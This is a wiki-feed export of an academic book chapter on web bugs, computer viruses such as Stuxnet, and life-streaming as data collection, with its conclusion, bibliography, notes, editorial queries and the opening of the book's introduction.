Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also [Eds: 'also' is repeated a number of times here] useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4708</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4708"/>
		<updated>2012-04-18T14:35:03Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
